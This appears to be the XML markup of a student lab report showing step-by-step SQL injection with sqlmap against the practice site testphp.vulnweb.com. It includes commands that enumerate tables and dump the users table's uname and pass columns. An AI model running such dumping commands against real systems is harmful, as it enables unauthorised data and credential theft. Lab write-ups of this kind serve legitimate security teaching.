      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– columns </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to know columns of the table specified </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And here we got the columns for table users in database acuart </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C uname --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -C </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can be used to specify multiple column name separated by a comma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –dump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">query retrieves the data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5681663" cy="3886043"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="4151" l="10196" r="23294" t="8496"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5681663" cy="388604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left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we can see uname and test columns from the uname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the data got dumped into a csv file in the location  we can open them and see the data </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First we have go to the file using path </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can 2 different users data in the file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3633788" cy="1200543"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="57746" l="22115" r="23557" t="13572"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3633788" cy="120054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left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3681413" cy="997049"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="57281" l="22596" r="23557" t="15289"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3681413" cy="99704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left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C pass --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6024563" cy="4173042"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="4042" l="10256" r="21955" t="7709"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6024563" cy="417304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left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can go check the file using path to see the data </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets see another table data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T artists --columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5986463" cy="4152131"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="3012" l="10096" r="22435" t="9036"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5986463" cy="415213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left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T artists -C aname --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we can the data aname specified or we can check the data in dump file too </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5910263" cy="4119682"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="9914" r="21545" t="7831"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5910263" cy="411968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left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>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0.png"/><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3.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mailto:bhumireddy.thanmaye2021@vitstudent.ac.in" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/"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